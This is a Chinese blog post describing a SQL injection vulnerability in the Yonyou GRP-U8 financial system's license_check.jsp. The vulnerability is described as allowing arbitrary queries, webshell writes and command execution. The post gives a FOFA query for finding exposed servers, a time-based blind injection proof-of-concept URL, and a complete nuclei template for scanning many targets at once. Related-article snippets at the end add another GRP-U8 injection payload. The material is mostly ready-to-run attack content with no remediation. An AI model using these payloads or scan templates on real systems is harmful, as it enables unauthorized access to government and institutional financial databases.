首页 > 数据库 >用友GRP-U8 license_check.jsp sql注入漏洞

用友GRP-U8 license_check.jsp sql注入漏洞

时间:2023-10-28 10:22:19浏览次数:32  
标签:GRP U8 license 用友 jsp check

漏洞描述

用友 GRP-U8 license_check.jsp 存在sql注入,攻击者可利用该漏洞执行任意SQL语句,如查询数据、下载数据、写入webshell、执行系统命令以及绕过登录限制等。

漏洞复现

fofa语法:app="用友-GRP-U8"
登录页面如下:

POC:
/u8qx/license_check.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:5%27--

nuclei批量yaml文件

id: yonyou_GRPU8_license_check_sqli
info:
  name: 用友GRP-U8 license_check.jsp sql注入漏洞
  author: mhb17
  severity: critical
  description: description
  reference:
    - https://
  tags: sqli
requests:
  - raw:
      - |+
        GET /u8qx/license_check.jsp?kjnd=1%27;WAITFOR%20DELAY%20%270:0:6%27-- HTTP/1.1
        Host: {{Hostname}}
        Upgrade-Insecure-Requests: 1
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.120 Safari/537.36
        Connection: close

    matchers:
      - type: word
        part: header
        words:
          - '200'
      - type: dsl
        dsl:
          - 'duration>=6'

注:使用该批量文件进行批量探测时,请调低nuclei的扫描速率,速率过高可能导致误报

标签:GRP,U8,license,用友,jsp,check
From: https://www.cnblogs.com/pursue-security/p/17793734.html

相关文章

  • 用友U8-Cloud upload.jsp 任意文件上传漏洞
    漏洞简介U8cloud聚焦成长型、创新型企业的云ERP,基于全新的企业互联网应用设计理念,为企业提供集人财物客、产供销于一体的云ERP整体解决方案,全面支持多组织业务协同、智能财务,人力服务、构建产业链智造平台,融合用友云服务实现企业互联网资源连接、共享、协同。该系统upload.......
  • API - 几种API接口模式 - RESTful、WebSocket、GraphQL、gRPC、Webhook
    总结TODO.....当思考使用哪种API接口时,你将会面临一个重要的决策。RESTful、GraphQL、gRPC、WebSocket和Webhook是当前流行的几种API接口模式。在本文中,我们将介绍这些接口的特点、用途和比较,帮助你选择最适合你应用程序需求的接口。引言随着现代应用程序的复杂性和用户期望的......
  • Keil5编译器报错:ARMLMD_LICENSE_FILE unset~解决
    keilMDK版本更新到最新版本是V5.38。由于V5.38不支持编译器5,并且将默认编译器设置为编译器6,所以我安装了编译器5(Arm编译器版本5,V5.06更新7),带有独立补丁。然后将编译器5添加到keil,设置编译器5为默认编译器,但是keil无法构建项目,构建输出部分打印如下,:ARMLMD_LICENSE_FILE:unset......
  • Lattice高速下载器HW-USBN-2B 如何申请 license
     如果用的芯片不是停产老旧芯片,Diamondprogrammer是不需要license绑定支持的。但是有些需要编程老旧的芯片。需要安装Diamondprogrammerstand-alone版本。另外需要单独的免费license,这样才能启用老旧芯片烧录功能。如果没有网站账户,请在https://www.latticesemi.c......
  • grpc
    UseHTTP2.0:CompatiblewithHTTP1.X,retainingthehighperformanceofTCPprotobuf是协议grpc无缝集成了protobuf......
  • 用友GPR-U8 slbmbygr SQL注入漏洞
    漏洞简介用友GRP-U8是面向政府及行政事业单位的财政管理应用。北京用友政务软件有限公司GRP-U8SQL注入漏洞。漏洞复现fofa语法:app="用友-GRP-U8"登录页面如下:POC:/u8qx/slbmbygr.jsp?gsdm=1';WAITFORDELAY'0:0:5'--sqlmap梭哈nuclei批量yaml文件id:yonyou_GRPU8_slb......
  • 用友GRP-RMIS datalist.jsp SQL注入漏洞
    漏洞描述用友GRP-RMIS系统的datalist.jsp存在sql注入漏洞漏洞复现fofa语法:app="用友-GRP-RMIS系统"系统登录页面如下:POC:POST/datalist.jspHTTP/1.1Host:xxxxUser-Agent:python-requests/2.31.0Accept-Encoding:gzip,deflateAccept:*/*Connection:closeConten......
  • LLM探索:为ChatGLM2的gRPC后端增加连续对话功能
    前言之前我做AIHub的时候通过gRPC的方式接入了ChatGLM等开源大模型,对于大模型这块我搞了个StarAI框架,相当于简化版的langchain,可以比较方便的把各种大模型和相关配套组合在一起使用。主要思路还是用的OpenAI接口的那套,降低学习成本,但之前为了快速开发,就只搞了个简单......
  • 易语言利用ckplayer写m3u8看片神器随聊
    也不知道什么时候开始,现在视频网站都是用m3u8格式,而且我对这个格式也不了解。不过,是真的不错,以前你想拖动看(拖着看爽),需要等视频前面都加载好,加载到你这里才能看。现在好了,m3u8因为是切片播放的,它只加载你拖动到的那一小节即可播放,确实先进不少。其实据我观察,现在大部分主流......
  • 在 kubernetes 环境中实现 gRPC 负载均衡
    前言前段时间写过一篇gRPC的入门文章,在最后还留了一个坑没有填:也就是gRPC的负载均衡问题,因为当时的业务请求量不算大,再加上公司没有对Istio这类服务网格比较熟悉的大牛,所以我们也就一直拖着没有解决,依然只是使用了kubernetes的service进行负载,好在也没有出什么问题......